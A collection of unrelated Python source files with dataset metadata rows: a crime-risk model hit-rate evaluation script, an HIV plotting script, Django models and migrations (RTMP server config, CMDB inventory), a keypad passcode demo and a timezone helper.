            if model_param_name not in model_param_names:
                model_param_names.append(model_param_name)
            # Store rows sorted first by coverage, then by model run.
            datadicts_by_cov_rate[dataline_cov][model_param_name].append(dataline_dict)
    return datadicts_by_cov_rate, dates_seen, model_param_names, sorted(cov_rates)
def graphHitRatesOverTime(results_full_path):
    """Plot, for each coverage rate, every model's hit rate over time.

    Reads the results csv via getDataByCovRate, then draws one figure per
    coverage rate with one line per model run. Exits with status 1 (fix:
    previously exited with status 0 despite being an error path, unlike
    every other error exit in this file) if any model is missing results
    for some evaluation dates.
    """
    datadicts_by_cov_rate, exp_dates, model_names, cov_rates = getDataByCovRate(results_full_path)
    for cov_rate in cov_rates:
        # Declare figure
        print("Declaring figure for graphHitRatesOverTime...")
        fig, ax = plt.subplots(figsize=(12, 6))
        names_for_legend = []
        cov_results_all_models = datadicts_by_cov_rate[cov_rate]
        num_dates = len(exp_dates)
        num_models = len(model_names)
        # Sanity check: every model must have one result per evaluation date.
        for mn in model_names:
            if len(cov_results_all_models[mn]) != num_dates:
                print("Error!")
                print(f"Model: {mn}")
                print(f"Expected number of experiments: {num_dates}")
                print(f"Found number of experiments: {len(cov_results_all_models[mn])}")
                sys.exit(1)
        # One matrix row of hit percentages per model, one column per date.
        result_matrix = np.zeros((num_models, num_dates))
        for mn_index, mn in enumerate(model_names):
            names_for_legend.append(mn)
            model_results = cov_results_all_models[mn]
            for mr_index, mr in enumerate(model_results):
                result_matrix[mn_index, mr_index] = mr["hit_pct"]
        for row in result_matrix:
            ax.plot(exp_dates, row)
        ax.legend(names_for_legend)
        ax.tick_params(axis='x', rotation=90)
        ax.set_title(f"Hit rates over time, coverage {cov_rate}")
    return
"""
Copied snippets from riskModelsCompare
Still working out this section...
"""
def graphCoverageVsHitRate(hit_rates_dict, model_runs_list, model_names):
    """Plot coverage (x in [0, 1]) against hit rate for every model run.

    hit_rates_dict maps model name -> list of hit-rate curves;
    model_runs_list maps model name -> the corresponding run labels.
    """
    # Pair each run label with its hit-rate curve, model by model.
    model_hit_rate_pairs = []
    for mn in model_names:
        model_hit_rate_pairs.extend(zip(model_runs_list[mn], hit_rates_dict[mn]))
    print(len(model_hit_rate_pairs))
    ### DECLARE FIGURE FOR HITRATE/COVERAGE
    # !!! I should add an option for the x-axis of the figure!!!
    print("Declaring figure for graphCoverageVsHitRate...")
    fig, ax = plt.subplots(figsize=(12, 6))
    names_for_legend = []
    # All curves share the same length; x runs linearly from 0 to 1.
    curve_len = len(hit_rates_dict[model_names[0]][0])
    x_axis_values = np.linspace(0, 1, curve_len)
    print(curve_len)
    for mn in model_names:
        for curve in hit_rates_dict[mn]:
            ax.plot(x_axis_values, curve)
        names_for_legend.extend(model_runs_list[mn])
    ax.legend(names_for_legend)
    return
"""
result_matrix = np.zeros((len(all_exp_results[0]), len(all_exp_results)))
for exp_num, exp in enumerate(all_exp_results):
for model_num, model_result in enumerate(exp):
result_matrix[model_num, exp_num] = model_result[0][coverage_cell_index]
for row_num, row in enumerate(result_matrix):
ax.plot(test_data_dates, row + (results_count_offset * row_num) )
names_for_legend.append(all_exp_results[0][row_num][1])
#ax.legend(names_for_legend)
ax.tick_params(axis='x', rotation=90)
# one of the orig sections from riskModelsCompare
# Declare figure
print("Declaring figure...")
fig, ax = plt.subplots(figsize=(12,6))
names_for_legend = []
result_matrix = np.zeros((len(all_exp_results[0]), len(all_exp_results)))
for exp_num, exp in enumerate(all_exp_results):
for model_num, model_result in enumerate(exp):
result_matrix[model_num, exp_num] = model_result[0][coverage_cell_index]
for row_num, row in enumerate(result_matrix):
ax.plot(test_data_dates, row + (results_count_offset * row_num) )
names_for_legend.append(all_exp_results[0][row_num][1])
#ax.legend(names_for_legend)
ax.tick_params(axis='x', rotation=90)
# Declare figure
print("Declaring figure...")
fig, ax = plt.subplots(figsize=(12,6))
names_for_legend = []
#xcoords = test_data_dates
coverage_rate = 0.10
coverage_cell_index = int(num_cells_region * coverage_rate)-1
print("reg {}".format(num_cells_region))
print("cov {}".format(coverage_rate))
print("cci {}".format(coverage_cell_index))
result_matrix = np.zeros((len(all_exp_results[0]), len(all_exp_results)))
for exp_num, exp in enumerate(all_exp_results):
if test_data_counts[exp_num] == 0:
continue
for model_num, model_result in enumerate(exp):
result_matrix[model_num, exp_num] = \
model_result[0][coverage_cell_index]/test_data_counts[exp_num]
for row_num, row in enumerate(result_matrix):
ax.plot(test_data_dates, row + (results_rate_offset * row_num) )
names_for_legend.append(all_exp_results[0][row_num][1])
#ax.legend(names_for_legend)
ax.tick_params(axis='x', rotation=90)
"""
def main():
    """Load model-evaluation csv results and write the configured summaries.

    Each write*Csv helper calls sys.exit itself, so only the first enabled
    summary block actually runs; the trailing analysis only executes when
    all summary flags are False.
    """
    datadir = os.path.join("..", "..", "Data")
    results_fname = "results_190628_Chicago_130101_5Y_1D.csv"
    # Only include results of tests later OR EQUAL to this date
    earliest_eval_date = np.datetime64("2013-01-01")
    # Only include results of tests earlier BUT NOT EQUAL to this date
    latest_eval_date = None
    results_full_path = os.path.join(datadir, results_fname)
    # Bug fix: getDataByCovRate returns a 4-tuple, but the whole tuple used
    # to be bound to a single name (leaving dates_seen permanently empty,
    # which broke num_dates and the min/max date lookups below). The
    # configured date window is now also actually forwarded.
    datadicts_by_cov_rate, dates_seen, model_param_names, cov_rates = \
        getDataByCovRate(results_full_path,
                         earliest_eval_date=earliest_eval_date,
                         latest_eval_date=latest_eval_date)
    # Number of evaluation dates in the data. We expect this to equal the
    # number of random/naive/ideal experiment instances, and the number of
    # phs experiments divided by the number of phs parameter combinations.
    num_dates = len(dates_seen)
    print(num_dates)
    sorted_dates = sorted(dates_seen)
    earliest_date_seen = sorted_dates[0]
    latest_date_seen = sorted_dates[-1]
    print(earliest_date_seen)
    print(latest_date_seen)
    phsdicts_by_cov_rate = dict((cov, d["phs"]) for cov, d in datadicts_by_cov_rate.items())
    naivedicts_by_cov_rate = dict((cov, d["naive"]) for cov, d in datadicts_by_cov_rate.items())
    create_naive_csv_summary = True
    if create_naive_csv_summary:
        timespan = "1M"
        date_today_str = getSixDigitDate(datetime.date.today())
        earliest_date_str = getSixDigitDate(earliest_date_seen)
        latest_date_str = getSixDigitDate(latest_date_seen)
        sumcsv_base = f"ratesummary_xsr_nai_{date_today_str}_{earliest_date_str}_{latest_date_str}_{timespan}.csv"
        sumcsvname = os.path.join(datadir, sumcsv_base)
        writeModelSummaryCsv(naivedicts_by_cov_rate, timespan, "naive", csvname=sumcsvname)
        sys.exit(0)
    create_phs_csv_summary = False
    if create_phs_csv_summary:
        timespan = "1M"
        date_today_str = getSixDigitDate(datetime.date.today())
        earliest_date_str = getSixDigitDate(earliest_date_seen)
        latest_date_str = getSixDigitDate(latest_date_seen)
        phssumcsv_base = f"ratesummary_xsr_phs_{date_today_str}_{earliest_date_str}_{latest_date_str}_{timespan}.csv"
        phssumcsvname = os.path.join(datadir, phssumcsv_base)
        writeModelSummaryCsv(phsdicts_by_cov_rate, timespan, "phs", csvname=phssumcsvname)
        sys.exit(0)
    create_phs_csv_var = True
    if create_phs_csv_var:
        timespan = "1M"
        date_today_str = getSixDigitDate(datetime.date.today())
        earliest_date_str = getSixDigitDate(earliest_date_seen)
        latest_date_str = getSixDigitDate(latest_date_seen)
        phssumcsv_base = f"ratevar_{date_today_str}_{earliest_date_str}_{latest_date_str}_{timespan}.csv"
        phssumcsvname = os.path.join(datadir, phssumcsv_base)
        writePhsVariabilityCsv(phsdicts_by_cov_rate, timespan, phssumcsvname)
        sys.exit(0)
    all_model_names = ["random", "naivecount", "ideal", "rhs", "phs"]
    basic_model_names = all_model_names[:3]
    for cov, datadicts_by_model in datadicts_by_cov_rate.items():
        print(f"Coverage rate: {cov}")
        # Overall result summaries for the basic (non-phs) models
        for model_name in basic_model_names:
            if model_name in datadicts_by_model:
                # List of results for this (coverage, model) combo
                datalist = datadicts_by_model[model_name]
                # Confirm we have the expected number of results
                if len(datalist) != num_dates:
                    print("Error! Unexpected number of results!")
                    print(f"Number expected per model: {num_dates}")
                    print(f"Number seen for model {model_name}: {len(datalist)}")
                    sys.exit(1)
                # Average of all individual hit rates
                # ("Hit" = event in testing period within model's top cov% cells)
                average_hit_rate = sum(d["hit_pct"] for d in datalist) / num_dates
                print(f"\tModel: {model_name}")
                print(f"\t\tAverage hit rate: {average_hit_rate:6.4f}")
        # Table of average hit rates for all PHS bandwidth pairs tested
        if "phs" in datadicts_by_model:
            phs_list = datadicts_by_model["phs"]
            print("0\t" + "\t".join(str(x) + " weeks" for x in range(1, 9)))
            best_avg_dist_time = (-1, 0, 0)
            for dist_band in range(100, 1100, 100):
                toprint_list = [str(dist_band)]
                for time_band in range(1, 9):
                    hit_rate_sum = sum(d["hit_pct"] for d in phs_list
                                       if d["param_pair"] == (time_band, dist_band))
                    hit_rate_avg = hit_rate_sum / num_dates
                    toprint_list.append(f"{hit_rate_avg:6.4f}")
                    if hit_rate_avg > best_avg_dist_time[0]:
                        best_avg_dist_time = (hit_rate_avg, dist_band, time_band)
                print("\t".join(toprint_list))
            print(f"Best average hit rate result: {best_avg_dist_time[0]:6.4f} {best_avg_dist_time[1:]}")
            sys.exit(0)

if __name__ == "__main__":
    main()
| 33.550754 | 130 | 0.623371 | 4,311 | 33,383 | 4.561123 | 0.143586 | 0.014596 | 0.012104 | 0.011392 | 0.342521 | 0.284748 | 0.244927 | 0.219244 | 0.202105 | 0.186747 | 0 | 0.016057 | 0.291076 | 33,383 | 994 | 131 | 33.584507 | 0.814798 | 0.18129 | 0 | 0.198454 | 1 | 0 | 0.100582 | 0.025904 | 0.002577 | 0 | 0 | 0 | 0 | 1 | 0.033505 | false | 0.002577 | 0.054124 | 0 | 0.110825 | 0.139175 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c6e32f7e7283b6370a0de49f39a51f43f1b82bb | 1,280 | py | Python | HIV model/others.py | omisolaidowu/HIV-story-telling | 290fbb9549ff0177fb2224553575aa24813fdc6a | [
"Apache-2.0"
] | null | null | null | HIV model/others.py | omisolaidowu/HIV-story-telling | 290fbb9549ff0177fb2224553575aa24813fdc6a | [
"Apache-2.0"
] | null | null | null | HIV model/others.py | omisolaidowu/HIV-story-telling | 290fbb9549ff0177fb2224553575aa24813fdc6a | [
"Apache-2.0"
] | null | null | null | '''
-*- coding: utf-8 -*-
Created on Fri Jan 17 12:34:15 2020
@author: Paul
'''
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
df=pd.read_excel(r'C:\Users\Paul\Desktop\Python projects\HIV_3.xlsx')
print(df)
print(df.isnull().sum())
ax=plt.figure(figsize=(8, 8))
years=['2000','2001', '2002', '2003', '2004', '2005', '2006', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015', '2016', '2017', '2018']
x=years
print(x)
line=plt.plot
y=df['']
z=df['Number_of_neonatal_deaths']
plt.xlabel('Changes over the years')
plt.ylabel('Occurence by population')
plt.xticks(rotation=90)
line(x,y, 'r', x, z, 'cyan' )
import matplotlib.patches as mpatches
red_patch = mpatches.Patch(color='red', label='New HIV prevalence among youths')
cyan_patch = mpatches.Patch(color='cyan', label='Neonatal deaths')
#blue_patch = mpatches.Patch(color='yellow', label='sIgM+IgG positive')
#orange_patch = mpatches.Patch(color='orange', label='site4')
#brown_patch = mpatches.Patch(color='brown', label='site5')
#black_patch = mpatches.Patch(color='black', label='site6')
plt.legend(handles=[red_patch, cyan_patch], loc=(0, 1))
plt.show()
| 29.767442 | 158 | 0.683594 | 194 | 1,280 | 4.427835 | 0.608247 | 0.090803 | 0.125728 | 0.160652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089029 | 0.13125 | 1,280 | 42 | 159 | 30.47619 | 0.683453 | 0.249219 | 0 | 0 | 0 | 0 | 0.277839 | 0.058434 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c82f844757360c3545bf98aad68a6f84622e3da | 711 | py | Python | app/core/migrations/0009_auto_20210214_2113.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | app/core/migrations/0009_auto_20210214_2113.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | app/core/migrations/0009_auto_20210214_2113.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.6 on 2021-02-14 18:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20210214_2039'),
]
operations = [
migrations.AlterField(
model_name='device',
name='ip_address',
field=models.GenericIPAddressField(blank=True, help_text='e.g. 192.168.0.17', null=True, verbose_name='IP address'),
),
migrations.AlterField(
model_name='device',
name='mac_address',
field=models.CharField(blank=True, help_text='e.g. A1:B2:C3:D4:5E:6F', max_length=100, null=True, verbose_name='MAC address'),
),
]
| 29.625 | 138 | 0.613221 | 88 | 711 | 4.818182 | 0.647727 | 0.09434 | 0.117925 | 0.136792 | 0.273585 | 0.273585 | 0 | 0 | 0 | 0 | 0 | 0.092105 | 0.251758 | 711 | 23 | 139 | 30.913043 | 0.704887 | 0.063291 | 0 | 0.352941 | 1 | 0 | 0.180723 | 0.034639 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c85c0c3fc3e88d3d1512b447e6a7c16569279b2 | 1,376 | py | Python | nginx_rtmp_wizard/models.py | Gerhut/nginx-rtmp-wizard | c821c3bb262503ee26408b8b3bf4a252b49a29d6 | [
"Unlicense"
] | null | null | null | nginx_rtmp_wizard/models.py | Gerhut/nginx-rtmp-wizard | c821c3bb262503ee26408b8b3bf4a252b49a29d6 | [
"Unlicense"
] | 1 | 2021-06-10T20:32:59.000Z | 2021-06-10T20:32:59.000Z | nginx_rtmp_wizard/models.py | Gerhut/nginx-rtmp-wizard | c821c3bb262503ee26408b8b3bf4a252b49a29d6 | [
"Unlicense"
] | null | null | null | from django.conf import settings
from django.core import validators
from django.db import models
DEFAULT_RTMP_PORT = 1935
class Server(models.Model):
listen = models.PositiveIntegerField(
default=DEFAULT_RTMP_PORT,
unique=True,
validators=[
validators.MinValueValidator(1024),
validators.MaxValueValidator(65535)
])
def __str__(self):
if self.listen == DEFAULT_RTMP_PORT:
return 'rtmp://{}'.format(settings.RTMP_HOSTNAME)
else:
return 'rtmp://{}:{}'.format(settings.RTMP_HOSTNAME, self.listen)
class Application(models.Model):
    """A named RTMP application (e.g. "live") hosted on a Server."""
    server = models.ForeignKey(Server, on_delete=models.CASCADE)
    name = models.SlugField(default='live')
    live = models.BooleanField(default=False)

    class Meta:
        # Application names must be unique per server.
        constraints = [
            models.UniqueConstraint(
                fields=['server', 'name'],
                name='unique_server_application_name')]

    def __str__(self):
        return '{}/{}'.format(self.server, self.name)
class Push(models.Model):
    """A downstream rtmp:// URL that an Application pushes its stream to."""
    application = models.ForeignKey(Application, on_delete=models.CASCADE)
    # Target must be an rtmp URL; uniqueness prevents duplicate push targets.
    url = models.CharField(
        max_length=255,
        unique=True,
        validators=[
            validators.URLValidator(schemes=['rtmp'])
        ])

    def __str__(self):
        # Rendered as an nginx-rtmp "push" directive line.
        return 'push {};'.format(self.url)
| 27.52 | 77 | 0.634448 | 140 | 1,376 | 6.05 | 0.385714 | 0.035419 | 0.053129 | 0.070838 | 0.085006 | 0.085006 | 0 | 0 | 0 | 0 | 0 | 0.015474 | 0.248547 | 1,376 | 49 | 78 | 28.081633 | 0.803675 | 0 | 0 | 0.236842 | 0 | 0 | 0.059593 | 0.021802 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.078947 | 0.052632 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0c914b89127421ea137b1e5268f255c0188586da | 775 | py | Python | contoh_2.py | sumarouno/4x4-Matrix-Keypad-Library-for-CHIP | 42794c3460818714fccc1c5a967e151504ef2ade | [
"MIT"
] | null | null | null | contoh_2.py | sumarouno/4x4-Matrix-Keypad-Library-for-CHIP | 42794c3460818714fccc1c5a967e151504ef2ade | [
"MIT"
] | null | null | null | contoh_2.py | sumarouno/4x4-Matrix-Keypad-Library-for-CHIP | 42794c3460818714fccc1c5a967e151504ef2ade | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from time import sleep
from sys import exit
import keypad_4x4_lib_sumar
kp =keypad_4x4_lib_sumar.keypad()
# Setup variables
attempt = "0000"
passcode = "1912"
counter = 0
# Loop while waiting for a keypress
while True:
# Loop to get a pressed digit
digit = None
while digit == None:
digit = kp.getKey()
# Print the result
print ("Digit Entered: %s"%digit)
attempt = (attempt[1:] + str(digit))
print ("Attempt value: %s"%attempt)
# Check for passcode match
if (attempt == passcode):
print ("Your code was correct, goodbye.")
exit()
else:
counter += 1
print ("Entered digit count: %s"%counter)
if (counter >= 4):
print ("Incorrect code!")
sleep(3)
print ("Try Again")
sleep(1)
counter = 0
sleep(0.5)
| 18.452381 | 43 | 0.658065 | 111 | 775 | 4.540541 | 0.531532 | 0.035714 | 0.047619 | 0.06746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036184 | 0.215484 | 775 | 41 | 44 | 18.902439 | 0.792763 | 0.176774 | 0 | 0.074074 | 0 | 0 | 0.208861 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.074074 | 0.111111 | 0 | 0.111111 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0c9646550e91efca615eedc91a6895d4f88c0e06 | 276 | py | Python | fdk_client/common/date_helper.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/common/date_helper.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/common/date_helper.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | from datetime import datetime
import pytz
from .constants import TIMEZONE
timezone = pytz.timezone(TIMEZONE)
def get_ist_now():
"""Returns Indian Standard Time datetime object.
Returns:
object -- Datetime object
"""
return datetime.now(timezone)
| 16.235294 | 52 | 0.710145 | 32 | 276 | 6.0625 | 0.5 | 0.14433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.213768 | 276 | 16 | 53 | 17.25 | 0.894009 | 0.307971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.5 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0c998b3ac75eae9f76dce560875ced69e8123b01 | 6,511 | py | Python | cmdb_v0.1/apps/detail/models.py | codemaker-man/projects | 334aac28b72a7b466fba23df4db11e95df13a3ec | [
"MIT"
] | 1 | 2018-12-05T05:29:46.000Z | 2018-12-05T05:29:46.000Z | cmdb_v0.1/apps/detail/models.py | codemaker-man/projects | 334aac28b72a7b466fba23df4db11e95df13a3ec | [
"MIT"
] | null | null | null | cmdb_v0.1/apps/detail/models.py | codemaker-man/projects | 334aac28b72a7b466fba23df4db11e95df13a3ec | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
from django.db import models
import django.utils.timezone as timezone
# Login credential table (physical servers and virtual machines).
class ConnectionInfo(models.Model):
    """SSH login credentials and connection status for a single host."""
    # SSH credentials used to reach the host.
    ssh_username = models.CharField(max_length=10, default='', verbose_name=u'ssh用户名', null=True)
    ssh_userpasswd = models.CharField(max_length=40, default='', verbose_name=u'ssh用户密码', null=True)
    ssh_hostip = models.CharField(max_length=40, default='', verbose_name=u'ssh登录的ip', null=True)
    ssh_host_port = models.CharField(max_length=10, default='', verbose_name=u'ssh登录的端口', null=True)
    ssh_rsa = models.CharField(max_length=64, default='', verbose_name=u'ssh私钥')
    rsa_pass = models.CharField(max_length=64, default='', verbose_name=u'私钥的密钥')
    # 0 = login failed, 1 = login succeeded.
    ssh_status = models.IntegerField(default=0, verbose_name=u'用户连接状态,0-登录失败,1-登录成功')
    # 1 = rsa login, 2 = dsa login, 3 = regular-user rsa login, 4 = docker OK, 5 = docker unreachable.
    ssh_type = models.IntegerField(default=0, verbose_name=u'用户连接类型, 1-rsa登录,2-dsa登录,'
                                              u'3-ssh_rsa登录,4-docker成功,5-docker无法登录')
    # Unique per-device identifier.
    sn_key = models.CharField(max_length=256, verbose_name=u"唯一设备ID", default="")
    class Meta:
        verbose_name = u'用户登录信息表'
        verbose_name_plural = verbose_name
        db_table = "connectioninfo"
# Login credential table (switches and other network devices).
class NetConnectionInfo(models.Model):
    """Telnet login credentials and connection status for a network device."""
    tel_username = models.CharField(max_length=10, default='', verbose_name=u'用户名', null=True)
    tel_userpasswd = models.CharField(max_length=40, default='', verbose_name=u'设备用户密码', null=True)
    tel_enpasswd = models.CharField(max_length=40, default='', verbose_name=u'设备超级用户密码', null=True)
    tel_host_port = models.CharField(max_length=10, default='', verbose_name=u'设备登录的端口', null=True)
    tel_hostip = models.CharField(max_length=40, default='', verbose_name=u'设备登录的ip', null=True)
    # 0 = login failed, 1 = login succeeded.
    tel_status = models.IntegerField(default=0, verbose_name=u'用户连接状态,0-登录失败,1-登录成功')
    tel_type = models.IntegerField(default=0, verbose_name=u'用户连接类型, 1-普通用户可登录,2-超级用户可登录')
    # Unique per-device identifier.
    sn_key = models.CharField(max_length=256, verbose_name=u"唯一设备ID", default="")
    dev_info = models.ForeignKey('NetWorkInfo')
    class Meta:
        verbose_name = u'网络设备用户登录信息'
        verbose_name_plural = verbose_name
        db_table = "netconnectioninfo"
# Rack (cabinet) information.
class CabinetInfo(models.Model):
    """A server rack; devices reference the rack they are mounted in."""
    cab_name = models.CharField(max_length=10, verbose_name=u'机柜编号')
    # Values 1-10 denote rack levels (U positions) 1 through 10.
    cab_lever = models.CharField(max_length=2, verbose_name=u'机器U数,1-10分别代表1~10层')
    class Meta:
        verbose_name = u'机柜信息表'
        verbose_name_plural = verbose_name
        db_table = "cabinetinfo"
# Physical server information.
class PhysicalServerInfo(models.Model):
    """A physical host, linked to its rack and its SSH login record."""
    # server_name = models.CharField(max_length=15, verbose_name=u'服务器名')
    server_ip = models.CharField(max_length=40, verbose_name=u'服务器IP')
    # Hardware brand (Dell or other?).
    machine_brand = models.CharField(max_length=60, default='--', verbose_name=u'服务器品牌')
    # Machine type (field kept commented out for reference).
    # machine_type = models.IntegerField(default=0, verbose_name=u'服务器,0-物理服务器,1-虚拟服务器,2-')
    system_ver = models.CharField(max_length=30, default='', verbose_name=u'操作系统版本')
    sys_hostname = models.CharField(max_length=15, verbose_name=u'操作系统主机名')
    mac = models.CharField(max_length=512, default='', verbose_name=u'MAC地址')
    sn = models.CharField(max_length=256, verbose_name=u'SN-主机的唯一标识', default='')
    vir_type = models.CharField(max_length=2, verbose_name=u'宿主机类型', default='')
    # Rack this physical server is mounted in.
    ser_cabin = models.ForeignKey('CabinetInfo')
    # SSH login record for this host.
    conn_phy = models.ForeignKey('ConnectionInfo')
    class Meta:
        verbose_name = u'物理服务器信息表'
        verbose_name_plural = verbose_name
        db_table = "physicalserverinfo"
# Virtual machine information.
class VirtualServerInfo(models.Model):
    """A virtual guest, linked to its physical host and its SSH login record."""
    # server_name = models.CharField(max_length=15, verbose_name=u'服务器名')
    server_ip = models.CharField(max_length=40, verbose_name=u'服务器IP')
    # Machine type codes (original note): 0=kvm, 2=virtual asset, 3=network device, 0=other/unknown.
    server_type = models.CharField(max_length=80, default='', verbose_name=u'服务器类型:kvm,Vmware,Docker,others')
    system_ver = models.CharField(max_length=30, default='', verbose_name=u'操作系统版本')
    sys_hostname = models.CharField(max_length=15, verbose_name=u'操作系统主机名')
    mac = models.CharField(max_length=512, default='', verbose_name=u'MAC地址')
    sn = models.CharField(max_length=256, verbose_name=u'SN-主机的唯一标识', default='')
    # Physical host this VM runs on.
    vir_phy = models.ForeignKey('PhysicalServerInfo')
    # SSH login record for this guest.
    conn_vir = models.ForeignKey('ConnectionInfo')
    class Meta:
        verbose_name = u'虚拟设备表'
        verbose_name_plural = verbose_name
        db_table = "virtualserverinfo"
# Network device table.
class NetWorkInfo(models.Model):
    """A network device (switch, etc.), linked to its rack."""
    host_ip = models.CharField(max_length=40, verbose_name=u'网络设备ip')
    host_name = models.CharField(max_length=10, verbose_name=u'网络设备名')
    sn = models.CharField(max_length=256, verbose_name=u"SN-设备的唯一标识", default="")
    # Rack this device is mounted in.
    net_cab = models.ForeignKey('CabinetInfo')
    class Meta:
        verbose_name = u'网络设备表'
        verbose_name_plural = verbose_name
        db_table = "networkinfo"
class OtherMachineInfo(models.Model):
    """Devices that could not be classified into the other categories."""
    ip = models.CharField(max_length=40, verbose_name=u'设备ip')
    sn_key = models.CharField(max_length=256, verbose_name=u'设备的唯一标识')
    machine_name = models.CharField(max_length=20, verbose_name=u'设备名称')
    remark = models.TextField(default='', verbose_name=u'备注')
    reson_str = models.CharField(max_length=128,verbose_name=u"归纳原因",default='')
    # Rack this device is mounted in.
    oth_cab = models.ForeignKey('CabinetInfo')
    class Meta:
        verbose_name = u'其它设备表'
        verbose_name_plural = verbose_name
        db_table = 'othermachineinfo'
class StatisticsRecord(models.Model):
    """Aggregated per-scan hardware counts (totals by device category)."""
    # BUG FIX: `default` must be the callable itself.  The original code used
    # default=timezone.now().strftime('%Y-%m-%d'), which is evaluated once at
    # class-definition time, freezing a single date string as the default for
    # every row created afterwards.  Passing the callable lets Django evaluate
    # it at each object's creation time.
    datatime = models.DateTimeField(verbose_name=u"更新时间", default=timezone.now)
    all_count = models.IntegerField(verbose_name=u"所有设备数量", default=0)
    pyh_count = models.IntegerField(verbose_name=u"物理设备数量", default=0)
    net_count = models.IntegerField(verbose_name=u"网络设备数量", default=0)
    other_count = models.IntegerField(verbose_name=u"其他设备数量", default=0)
    kvm_count = models.IntegerField(verbose_name=u"KVM设备数量", default=0)
    docker_count = models.IntegerField(verbose_name=u"Docker设备数量", default=0)
    vmx_count = models.IntegerField(verbose_name=u"VMX设备数量", default=0)
    class Meta:
        verbose_name = u'扫描后的汇总硬件统计信息'
        verbose_name_plural = verbose_name
        db_table = 'statisticsrecord'
| 42.835526 | 109 | 0.714176 | 875 | 6,511 | 5.106286 | 0.213714 | 0.184646 | 0.15846 | 0.198747 | 0.649284 | 0.602283 | 0.547449 | 0.484781 | 0.435989 | 0.34624 | 0 | 0.024239 | 0.157272 | 6,511 | 151 | 110 | 43.119205 | 0.790049 | 0.083397 | 0 | 0.285714 | 0 | 0 | 0.119024 | 0.010943 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.040816 | 0.020408 | 0 | 0.744898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0c9b51976e219b5f5ddeb4bf2182d69d5aa73bdd | 1,202 | py | Python | backend/api/migrations/0002_auto_20210517_0943.py | luxu/django-vue-luxu | a4da215697df578074e354d43dd1d9995490d0db | [
"MIT"
] | null | null | null | backend/api/migrations/0002_auto_20210517_0943.py | luxu/django-vue-luxu | a4da215697df578074e354d43dd1d9995490d0db | [
"MIT"
] | null | null | null | backend/api/migrations/0002_auto_20210517_0943.py | luxu/django-vue-luxu | a4da215697df578074e354d43dd1d9995490d0db | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-05-17 12:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: creates Pavilhao and Sentenciado and
